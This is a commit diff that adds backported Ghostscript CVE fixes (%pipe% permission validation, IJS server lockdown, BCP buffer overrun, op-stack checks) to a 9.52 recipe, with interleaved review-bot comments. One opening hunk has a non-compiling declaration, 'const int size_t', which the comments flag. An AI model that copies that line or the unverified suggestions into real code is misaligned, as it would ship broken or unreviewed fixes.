111 | diff --git a/base/gp_os2pr.c b/base/gp_os2pr.c | ||
112 | index f852c71fc..ba54cde66 100644 | ||
113 | --- a/base/gp_os2pr.c | ||
114 | +++ b/base/gp_os2pr.c | ||
115 | @@ -107,9 +107,20 @@ os2_printer_fopen(gx_io_device * iodev, const char *fname, const char *access, | ||
116 | FILE ** pfile, char *rfname, uint rnamelen) | ||
117 | { | ||
118 | os2_printer_t *pr = (os2_printer_t *)iodev->state; | ||
119 | - char driver_name[256]; | ||
120 | + char driver_name[gp_file_name_sizeof]; | ||
121 | gs_lib_ctx_t *ctx = mem->gs_lib_ctx; | ||
122 | gs_fs_list_t *fs = ctx->core->fs; | ||
123 | + const size_t preflen = strlen(iodev->dname); | ||
124 | + const int size_t = strlen(fname); | ||
125 | + | ||
126 | + if (preflen + nlen >= gp_file_name_sizeof) | ||
127 | + return_error(gs_error_invalidaccess); | ||
128 | + | ||
129 | + memcpy(driver_name, iodev->dname, preflen); | ||
130 | + memcpy(driver_name + preflen, fname, nlen + 1); | ||
131 | + | ||
132 | + if (gp_validate_path(mem, driver_name, access) != 0) | ||
133 | + return gs_error_invalidfileaccess; | ||
134 | |||
135 | /* First we try the open_printer method. */ | ||
136 | /* Note that the loop condition here ensures we don't | ||
137 | diff --git a/base/gslibctx.c b/base/gslibctx.c | ||
138 | index 6dfed6cd5..318039fad 100644 | ||
139 | --- a/base/gslibctx.c | ||
140 | +++ b/base/gslibctx.c | ||
141 | @@ -655,82 +655,39 @@ rewrite_percent_specifiers(char *s) | ||
142 | int | ||
143 | gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
144 | { | ||
145 | - char *fp, f[gp_file_name_sizeof]; | ||
146 | - const int pipe = 124; /* ASCII code for '|' */ | ||
147 | - const int len = strlen(fname); | ||
148 | - int i, code; | ||
149 | + char f[gp_file_name_sizeof]; | ||
150 | + int code; | ||
151 | |||
152 | /* Be sure the string copy will fit */ | ||
153 | - if (len >= gp_file_name_sizeof) | ||
154 | + if (strlen(fname) >= gp_file_name_sizeof) | ||
155 | return gs_error_rangecheck; | ||
156 | strcpy(f, fname); | ||
157 | - fp = f; | ||
158 | /* Try to rewrite any %d (or similar) in the string */ | ||
159 | rewrite_percent_specifiers(f); | ||
160 | - for (i = 0; i < len; i++) { | ||
161 | - if (f[i] == pipe) { | ||
162 | - fp = &f[i + 1]; | ||
163 | - /* Because we potentially have to check file permissions at two levels | ||
164 | - for the output file (gx_device_open_output_file and the low level | ||
165 | - fopen API, if we're using a pipe, we have to add both the full string, | ||
166 | - (including the '|', and just the command to which we pipe - since at | ||
167 | - the pipe_fopen(), the leading '|' has been stripped. | ||
168 | - */ | ||
169 | - code = gs_add_control_path(mem, gs_permit_file_writing, f); | ||
170 | - if (code < 0) | ||
171 | - return code; | ||
172 | - code = gs_add_control_path(mem, gs_permit_file_control, f); | ||
173 | - if (code < 0) | ||
174 | - return code; | ||
175 | - break; | ||
176 | - } | ||
177 | - if (!IS_WHITESPACE(f[i])) | ||
178 | - break; | ||
179 | - } | ||
180 | - code = gs_add_control_path(mem, gs_permit_file_control, fp); | ||
181 | + | ||
182 | + code = gs_add_control_path(mem, gs_permit_file_control, f); | ||
183 | if (code < 0) | ||
184 | return code; | ||
185 | - return gs_add_control_path(mem, gs_permit_file_writing, fp); | ||
186 | + return gs_add_control_path(mem, gs_permit_file_writing, f); | ||
187 | } | ||
188 | |||
189 | int | ||
190 | gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
191 | { | ||
192 | - char *fp, f[gp_file_name_sizeof]; | ||
193 | - const int pipe = 124; /* ASCII code for '|' */ | ||
194 | - const int len = strlen(fname); | ||
195 | - int i, code; | ||
196 | + char f[gp_file_name_sizeof]; | ||
197 | + int code; | ||
198 | |||
199 | /* Be sure the string copy will fit */ | ||
200 | - if (len >= gp_file_name_sizeof) | ||
201 | + if (strlen(fname) >= gp_file_name_sizeof) | ||
202 | return gs_error_rangecheck; | ||
203 | strcpy(f, fname); | ||
204 | - fp = f; | ||
205 | /* Try to rewrite any %d (or similar) in the string */ | ||
206 | - for (i = 0; i < len; i++) { | ||
207 | - if (f[i] == pipe) { | ||
208 | - fp = &f[i + 1]; | ||
209 | - /* Because we potentially have to check file permissions at two levels | ||
210 | - for the output file (gx_device_open_output_file and the low level | ||
211 | - fopen API, if we're using a pipe, we have to add both the full string, | ||
212 | - (including the '|', and just the command to which we pipe - since at | ||
213 | - the pipe_fopen(), the leading '|' has been stripped. | ||
214 | - */ | ||
215 | - code = gs_remove_control_path(mem, gs_permit_file_writing, f); | ||
216 | - if (code < 0) | ||
217 | - return code; | ||
218 | - code = gs_remove_control_path(mem, gs_permit_file_control, f); | ||
219 | - if (code < 0) | ||
220 | - return code; | ||
221 | - break; | ||
222 | - } | ||
223 | - if (!IS_WHITESPACE(f[i])) | ||
224 | - break; | ||
225 | - } | ||
226 | - code = gs_remove_control_path(mem, gs_permit_file_control, fp); | ||
227 | + rewrite_percent_specifiers(f); | ||
228 | + | ||
229 | + code = gs_remove_control_path(mem, gs_permit_file_control, f); | ||
230 | if (code < 0) | ||
231 | return code; | ||
232 | - return gs_remove_control_path(mem, gs_permit_file_writing, fp); | ||
233 | + return gs_remove_control_path(mem, gs_permit_file_writing, f); | ||
234 | } | ||
235 | |||
236 | int | ||
237 | -- | ||
238 | 2.25.1 | ||
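Review bot: In the `os2_printer_fopen` hunk (base/gp_os2pr.c) the new declaration `const int size_t = strlen(fname);` names the variable `size_t`, while the lines after it use `nlen`, which that hunk never declares; as written the file would not compile, and the line should read `const size_t nlen = strlen(fname);` as in the other three openers. In the `mswin_printer_fopen` hunk the prefixed name is assembled in `pname`, whose declaration is outside the hunk, so the `gp_file_name_sizeof` length check only protects the two `memcpy` calls if `pname` is at least that large. Both files are platform-specific and presumably not built for these targets, so the effect here is likely nil, but it is worth a line in the patch header so the backport is not mistaken for a tested change on those platforms. The new length checks also return `gs_error_invalidaccess` while the validation failure next to them returns `gs_error_invalidfileaccess`; that may be intentional, but it reads like a slip. All four function bodies start and end outside their hunks.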
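--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch
@@ -0,0 +1,65 @@
+From 6643ff0cb837db3eade489ffff21e3e92eee2ae0 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Fri, 28 Jan 2022 08:21:19 +0000
+Subject: [PATCH] [PATCH] Bug 703902: Fix op stack management in
+sampled_data_continue()
+
+Replace pop() (which does no checking, and doesn't handle stack extension
+blocks) with ref_stack_pop() which does do all that.
+
+We still use pop() in one case (it's faster), but we have to later use
+ref_stack_pop() before calling sampled_data_sample() which also accesses the
+op stack.
+
+Fixes:
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=34675
+
+Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=2a3129365d3bc0d4a41f107ef175920d1505d1f7]
+CVE: CVE-2021-45949
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+psi/zfsample.c | 13 ++++++++-----
+1 file changed, 8 insertions(+), 5 deletions(-)
+
+diff --git a/psi/zfsample.c b/psi/zfsample.c
+index 0023fa4..f84671f 100644
+--- a/psi/zfsample.c
++++ b/psi/zfsample.c
+@@ -534,14 +534,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+data_ptr[bps * i + j] = (byte)(cv >> ((bps - 1 - j) * 8)); /* MSB first */
+}
+pop(num_out); /* Move op to base of result values */
+-
++ /* From here on, we have to use ref_stack_pop() rather than pop()
++ so that it handles stack extension blocks properly, before calling
++ sampled_data_sample() which also uses the op stack.
++ */
+/* Check if we are done collecting data. */
+
+if (increment_cube_indexes(params, penum->indexes)) {
+if (stack_depth_adjust == 0)
+- pop(O_STACK_PAD); /* Remove spare stack space */
++ ref_stack_pop(&o_stack, O_STACK_PAD); /* Remove spare stack space */
+else
+- pop(stack_depth_adjust - num_out);
++ ref_stack_pop(&o_stack, stack_depth_adjust - num_out);
+/* Execute the closing procedure, if given */
+code = 0;
+if (esp_finish_proc != 0)
+@@ -554,11 +557,11 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+if ((O_STACK_PAD - stack_depth_adjust) < 0) {
+stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
+check_op(stack_depth_adjust);
+- pop(stack_depth_adjust);
++ ref_stack_pop(&o_stack, stack_depth_adjust);
+}
+else {
+check_ostack(O_STACK_PAD - stack_depth_adjust);
+- push(O_STACK_PAD - stack_depth_adjust);
++ ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust);
+for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
+make_null(op - i);
+}
+--
+2.17.1
+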
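Review bot: In the second zfsample.c hunk of this patch the result of `ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust);` is discarded, and the loop that follows still writes through the local `op` (`make_null(op - i)`). The `push()` it replaces is a macro; if, as it appears, that macro also advanced `op`, the nulls may now land below the newly pushed slots, so please confirm against the upstream tree and reload `op` from the stack top after the call if needed. Separately, the header tag reads `Upstream-Status: Backported [...]` while the other patches added in this commit use `Backport`; check-stack-limits-after-function-evalution.patch has the same spelling and should be aligned too. sampled_data_continue() starts and ends outside the hunks.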
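--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch
@@ -0,0 +1,54 @@
+From 37ed5022cecd584de868933b5b60da2e995b3179 Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Fri, 24 Mar 2023 13:19:57 +0000
+Subject: [PATCH] Graphics library - prevent buffer overrun in (T)BCP encoding
+
+Bug #706494 "Buffer Overflow in s_xBCPE_process"
+
+As described in detail in the bug report, if the write buffer is filled
+to one byte less than full, and we then try to write an escaped
+character, we overrun the buffer because we don't check before
+writing two bytes to it.
+
+This just checks if we have two bytes before starting to write an
+escaped character and exits if we don't (replacing the consumed byte
+of the input).
+
+Up for further discussion; why do we even permit a BCP encoding filter
+anyway ? I think we should remove this, at least when SAFER is true.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=37ed5022cecd584de868933b5b60da2e995b3179]
+CVE: CVE-2023-28879
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+base/sbcp.c | 10 +++++++++-
+1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/base/sbcp.c b/base/sbcp.c
+index 6b0383c..90784b5 100644
+--- a/base/sbcp.c
++++ b/base/sbcp.c
+@@ -1,4 +1,4 @@
+-/* Copyright (C) 2001-2019 Artifex Software, Inc.
++/* Copyright (C) 2001-2023 Artifex Software, Inc.
+All Rights Reserved.
+
+This software is provided AS-IS with no warranty, either express or
+@@ -50,6 +50,14 @@ s_xBCPE_process(stream_state * st, stream_cursor_read * pr,
+byte ch = *++p;
+
+if (ch <= 31 && escaped[ch]) {
++ /* Make sure we have space to store two characters in the write buffer,
++ * if we don't then exit without consuming the input character, we'll process
++ * that on the next time round.
++ */
++ if (pw->limit - q < 2) {
++ p--;
++ break;
++ }
+if (p == rlimit) {
+p--;
+break;
+--
+2.25.1
+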
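Review bot: The new early exit `if (pw->limit - q < 2) { p--; break; }` leaves the loop with input still pending, so the status computed after the loop has to report a full output buffer rather than a need for more input. That code is outside the hunk and should be checked in the 9.52 tree this backport targets. The commit message's own follow-up, whether the BCP encode filter should be available at all when SAFER is on, is not addressed here and is worth tracking separately.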
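--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch
@@ -0,0 +1,145 @@
+From 5e65eeae225c7d02d447de5abaf4a8e6d234fcea Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Wed, 7 Jun 2023 10:23:06 +0100
+Subject: [PATCH] Bug 706761: Don't "reduce" %pipe% file names for permission validation
+
+For regular file names, we try to simplfy relative paths before we use them.
+
+Because the %pipe% device can, effectively, accept command line calls, we
+shouldn't be simplifying that string, because the command line syntax can end
+up confusing the path simplifying code. That can result in permitting a pipe
+command which does not match what was originally permitted.
+
+Special case "%pipe" in the validation code so we always deal with the entire
+string.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=505eab7782b429017eb434b2b95120855f2b0e3c]
+CVE: CVE-2023-36664
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+base/gpmisc.c | 31 +++++++++++++++++++--------
+base/gslibctx.c | 56 ++++++++++++++++++++++++++++++++++++-------------
+2 files changed, 64 insertions(+), 23 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index c4fffae..09ac6b3 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -1046,16 +1046,29 @@ gp_validate_path_len(const gs_memory_t *mem,
+&& !memcmp(path + cdirstrl, dirsepstr, dirsepstrl)) {
+prefix_len = 0;
+}
+- rlen = len+1;
+- bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
+- if (bufferfull == NULL)
+- return gs_error_VMerror;
+-
+- buffer = bufferfull + prefix_len;
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
+
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len+1;
++ bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
++ if (bufferfull == NULL)
++ return gs_error_VMerror;
++
++ buffer = bufferfull + prefix_len;
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+while (1) {
+switch (mode[0])
+{
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 20c5eee..355c0e3 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -719,14 +719,28 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch
+return gs_error_rangecheck;
+}
+
+- rlen = len+1;
+- buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path");
+- if (buffer == NULL)
+- return gs_error_VMerror;
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len + 1;
+
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
++ buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_add_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+
+n = control->num;
+for (i = 0; i < n; i++)
+@@ -802,14 +816,28 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const
+return gs_error_rangecheck;
+}
+
+- rlen = len+1;
+- buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path");
+- if (buffer == NULL)
+- return gs_error_VMerror;
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len+1;
+
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
++ buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_remove_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+
+n = control->num;
+for (i = 0; i < n; i++) {
+--
+2.25.1
+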
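Review bot: Each `else` branch added here still returns `gs_error_invalidfileaccess` straight after `gp_file_name_reduce()` fails, without releasing the buffer allocated a few lines earlier. A path that cannot be reduced therefore leaks that buffer on every call in gp_validate_path_len, gs_add_control_path_len and gs_remove_control_path_len. Freeing first closes it, e.g. `gs_free_object(core->memory, buffer, "gs_add_control_path_len");` before the return in gslibctx.c and the same call with `mem->thread_safe_memory, bufferfull` in gpmisc.c; the leak predates this patch, but the lines are rewritten here. The `memcmp(path, "%pipe", 5) != 0` test in all three places selects the non-pipe case, so this patch is only correct together with CVE-2023-36664-2.patch and the two must stay adjacent and in order in SRC_URI. The enclosing functions start and end outside the hunks.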
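--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch
@@ -0,0 +1,60 @@
+From fb342fdb60391073a69147cb71af1ac416a81099 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Wed, 14 Jun 2023 09:08:12 +0100
+Subject: [PATCH] Bug 706778: 706761 revisit
+
+Two problems with the original commit. The first a silly typo inverting the
+logic of a test.
+
+The second was forgetting that we actually actually validate two candidate
+strings for pipe devices. One with the expected "%pipe%" prefix, the other
+using the pipe character prefix: "|".
+
+This addresses both those.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=fb342fdb60391073a69147cb71af1ac416a81099]
+CVE: CVE-2023-36664
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+base/gpmisc.c | 2 +-
+base/gslibctx.c | 4 ++--
+2 files changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index 09ac6b3..01d449f 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -1050,7 +1050,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+/* "%pipe%" do not follow the normal rules for path definitions, so we
+don't "reduce" them to avoid unexpected results
+*/
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path");
+if (buffer == NULL)
+return gs_error_VMerror;
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 355c0e3..d8f74a3 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -722,7 +722,7 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch
+/* "%pipe%" do not follow the normal rules for path definitions, so we
+don't "reduce" them to avoid unexpected results
+*/
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len");
+if (buffer == NULL)
+return gs_error_VMerror;
+@@ -819,7 +819,7 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const
+/* "%pipe%" do not follow the normal rules for path definitions, so we
+don't "reduce" them to avoid unexpected results
+*/
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len");
+if (buffer == NULL)
+return gs_error_VMerror;
+--
+2.25.1
+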
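Review bot: The corrected condition reads `path[0]` before any length test, so with `len == 0` it inspects a byte outside the caller's range unless an earlier check (outside these hunks) already rejects empty paths. Writing it as `if ((len > 0 && path[0] == '|') || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {` makes the guard self-contained in gp_validate_path_len, gs_add_control_path_len and gs_remove_control_path_len. The comment above the test still mentions only "%pipe%" and should also name the `|` prefix form that the condition now covers.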
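--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch
@@ -0,0 +1,62 @@
+From 4ceaf92815302863a8c86fcfcf2347e0118dd3a5 Mon Sep 17 00:00:00 2001
+From: Ray Johnston <ray.johnston@artifex.com>
+Date: Tue, 22 Sep 2020 13:10:04 -0700
+Subject: [PATCH] Fix gp_file allocations to use thread_safe_memory.
+
+The gpmisc.c does allocations for gp_file objects and buffers used by
+gp_fprintf, as well as gp_validate_path_len. The helgrind run with
+-dBGPrint -dNumRenderingThreads=4 and PCL input showed up the gp_fprintf
+problem since the clist rendering would call gp_fprintf using the same
+allocator (PCL's chunk allocator which is non_gc_memory). The chunk
+allocator is intentionally not thread safe (for performance).
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4ceaf92815302863a8c86fcfcf2347e0118dd3a5]
+CVE: CVE-2023-36664 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+base/gpmisc.c | 8 ++++----
+1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index 34cd71f..c4fffae 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -435,7 +435,7 @@ generic_pwrite(gp_file *f, size_t count, gs_offset_t offset, const void *buf)
+
+gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t size, const char *cname)
+{
+- gp_file *file = (gp_file *)gs_alloc_bytes(mem->non_gc_memory, size, cname ? cname : "gp_file");
++ gp_file *file = (gp_file *)gs_alloc_bytes(mem->thread_safe_memory, size, cname ? cname : "gp_file");
+if (file == NULL)
+return NULL;
+
+@@ -449,7 +449,7 @@ gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t
+memset(((char *)file)+sizeof(*prototype),
+0,
+size - sizeof(*prototype));
+- file->memory = mem->non_gc_memory;
++ file->memory = mem->thread_safe_memory;
+
+return file;
+}
+@@ -1047,7 +1047,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+prefix_len = 0;
+}
+rlen = len+1;
+- bufferfull = (char *)gs_alloc_bytes(mem->non_gc_memory, rlen + prefix_len, "gp_validate_path");
++ bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
+if (bufferfull == NULL)
+return gs_error_VMerror;
+
+@@ -1093,7 +1093,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+break;
+}
+
+- gs_free_object(mem->non_gc_memory, bufferfull, "gp_validate_path");
++ gs_free_object(mem->thread_safe_memory, bufferfull, "gp_validate_path");
+#ifdef EACCES
+if (code == gs_error_invalidfileaccess)
+errno = EACCES;
+--
+2.25.1
+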
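--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch
@@ -0,0 +1,62 @@
+From 8b0f20002536867bd73ff4552408a72597190cbe Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Thu, 24 Aug 2023 15:24:35 +0100
+Subject: [PATCH] IJS device - try and secure the IJS server startup
+
+Bug #707051 ""ijs" device can execute arbitrary commands"
+
+The problem is that the 'IJS' device needs to start the IJS server, and
+that is indeed an arbitrary command line. There is (apparently) no way
+to validate it. Indeed, this is covered quite clearly in the comments
+at the start of the source:
+
+* WARNING: The ijs server can be selected on the gs command line
+* which is a security risk, since any program can be run.
+
+Previously this used the awful LockSafetyParams hackery, which we
+abandoned some time ago because it simply couldn't be made secure (it
+was implemented in PostScript and was therefore vulnerable to PostScript
+programs).
+
+This commit prevents PostScript programs switching to the IJS device
+after SAFER has been activated, and prevents changes to the IjsServer
+parameter after SAFER has been activated.
+
+SAFER is activated, unless explicitly disabled, before any user
+PostScript is executed which means that the device and the server
+invocation can only be configured on the command line. This does at
+least provide minimal security against malicious PostScript programs.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=e59216049cac290fb437a04c4f41ea46826cfba5]
+CVE: CVE-2023-43115
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+devices/gdevijs.c | 5 ++++-
+1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/devices/gdevijs.c b/devices/gdevijs.c
+index 3d337c5..e50d69f 100644
+--- a/devices/gdevijs.c
++++ b/devices/gdevijs.c
+@@ -934,6 +934,9 @@ gsijs_finish_copydevice(gx_device *dev, const gx_device *from_dev)
+static const char rgb[] = "DeviceRGB";
+gx_device_ijs *ijsdev = (gx_device_ijs *)dev;
+
++ if (ijsdev->memory->gs_lib_ctx->core->path_control_active)
++ return_error(gs_error_invalidaccess);
++
+code = gx_default_finish_copydevice(dev, from_dev);
+if(code < 0)
+return code;
+@@ -1363,7 +1366,7 @@ gsijs_put_params(gx_device *dev, gs_param_list *plist)
+if (code >= 0)
+code = gsijs_read_string(plist, "IjsServer",
+ijsdev->IjsServer, sizeof(ijsdev->IjsServer),
+- dev->LockSafetyParams, is_open);
++ ijsdev->memory->gs_lib_ctx->core->path_control_active, is_open);
+
+if (code >= 0)
+code = gsijs_read_string_malloc(plist, "DeviceManufacturer",
+--
+2.25.1
+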
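Review bot: The check added at the top of gsijs_finish_copydevice has no comment, and `path_control_active` does not by itself say why copying the device is refused. A line such as `/* IjsServer is run as a command: refuse to switch to this device once SAFER (path control) is active */` above the `if` would record the intent stated in the commit message. The protection only holds while SAFER is active, so deployments that process untrusted PostScript should not disable SAFER and, if the ijs device is unused, may prefer not to build it at all. Both functions continue outside the hunks.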
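--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch
@@ -0,0 +1,51 @@
+From 7861fcad13c497728189feafb41cd57b5b50ea25 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Fri, 12 Feb 2021 10:34:23 +0000
+Subject: [PATCH] oss-fuzz 30715: Check stack limits after function evaluation.
+
+During function result sampling, after the callout to the Postscript
+interpreter, make sure there is enough stack space available before pushing
+or popping entries.
+
+In thise case, the Postscript procedure for the "function" is totally invalid
+(as a function), and leaves the op stack in an unrecoverable state (as far as
+function evaluation is concerned). We end up popping more entries off the
+stack than are available.
+
+To cope, add in stack limit checking to throw an appropriate error when this
+happens.
+CVE: CVE-2021-45944
+Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=7861fcad13c497728189feafb41cd57b5b50ea25]
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+psi/zfsample.c | 14 +++++++++++---
+1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/psi/zfsample.c b/psi/zfsample.c
+index 290809405..652ae02c6 100644
+--- a/psi/zfsample.c
++++ b/psi/zfsample.c
+@@ -551,9 +551,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+} else {
+if (stack_depth_adjust) {
+stack_depth_adjust -= num_out;
+- push(O_STACK_PAD - stack_depth_adjust);
+- for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
+- make_null(op - i);
++ if ((O_STACK_PAD - stack_depth_adjust) < 0) {
++ stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
++ check_op(stack_depth_adjust);
++ pop(stack_depth_adjust);
++ }
++ else {
++ check_ostack(O_STACK_PAD - stack_depth_adjust);
++ push(O_STACK_PAD - stack_depth_adjust);
++ for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
++ make_null(op - i);
++ }
+}
+}
+
+--
+2.25.1
+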
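Review bot: This patch carries `CVE: CVE-2021-45944` but is named check-stack-limits-after-function-evalution.patch (with "evaluation" misspelled), unlike the other fixes added in this directory, which are named after their CVE. Naming it `CVE-2021-45944.patch` and updating the SRC_URI entry would make the fix easier to find when auditing which CVEs the recipe covers. CVE-2021-45949.patch edits the lines this patch adds, so the two must keep their current order in SRC_URI.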
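--- a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
+++ b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
@@ -19,6 +19,10 @@ DEPENDS_class-native = "libpng-native"
 UPSTREAM_CHECK_URI = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases"
 UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)\.tar"
 
+# The jpeg issue in the CVE is present in the gs jpeg sources
+# however we use an external jpeg which doesn't have the issue.
+CVE_CHECK_WHITELIST += "CVE-2013-6629"
+
 def gs_verdir(v):
 return "".join(v.split("."))
 
@@ -29,12 +33,24 @@ SRC_URI_BASE = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/d
 file://do-not-check-local-libpng-source.patch \
 file://avoid-host-contamination.patch \
 file://mkdir-p.patch \
+file://CVE-2020-15900.patch \
+file://check-stack-limits-after-function-evalution.patch \
+file://CVE-2021-45949.patch \
+file://CVE-2021-3781_1.patch \
+file://CVE-2021-3781_2.patch \
+file://CVE-2021-3781_3.patch \
+file://CVE-2023-28879.patch \
+file://0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch \
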